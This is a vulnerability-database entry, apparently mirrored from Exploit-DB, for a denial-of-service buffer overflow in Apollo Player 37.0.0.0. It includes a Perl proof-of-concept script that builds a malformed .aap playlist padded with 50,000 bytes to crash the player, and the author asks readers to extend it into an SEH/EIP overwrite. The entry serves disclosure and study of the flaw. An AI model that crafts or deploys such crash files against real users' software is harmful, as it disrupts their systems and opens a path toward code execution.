Apollo Player 37.0.0.0 .aap BOF DOS Vulnerability

vendor:

Apollo Player

by:

Jacky

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Apollo Player

Affected Version From: 37.0.0.0

Affected Version To: 37.0.0.0

Patch Exists: Unknown

Related CWE: N/A

CPE: a:apollo_player:37.0.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

Unknown

Apollo Player 37.0.0.0 .aap BOF DOS Vulnerability

When a user plays normal songs and saves the playlist as .aap, and then opens it up with notepad, a header is written at the beginning of the malicious file. If anyone can overwrite the SEH chain or EIP by some method, the exploit code can be sent to Jacky_thekiller@hotmail.com.

Mitigation:

Ensure that the application is up to date and patched with the latest security updates.

Source

Exploit-DB raw data:

#Apollo Player 37.0.0.0 .aap BOF DOS Vulnerability
#Discovered and Written by : (jacky )
#Greetz to Peter Van Eeckhoutte and all Corelanc0d3r team ( Rick & mr_me & MarKoT &Edi)
#When you play normal songs and you save the playlist as .aap , and then open it up with notepad , u will note that it contains a header that MUST be written at the beginning of our malicious file ( I Like this type of exploits :P COOL !!! )
#If anyone can Overwrite the SEH chain or eip by some how method , just send your exploit's code to ( Jacky_thekiller@hotmail.com ) and i will be very happy of that ^.^
my $file="Crash.aap";
my $header="[Apollo Advanced Playlist]\nVersion=1.00\n[Entries]\nEntry1=";  #Playlist Header!!!
my $junk="A"x50000;                # A Random buffer to just make a crash .
my $end="\nNumberOfEntries=2";        #Playlist End !!!
open(POOH,">$file");
print POOH $header.$junk.$end;
print "[+]Malicious File created successfully!\n";
print "[+]Discovered and Coded by Jacky ( ME ) :P\n";
close(POOH);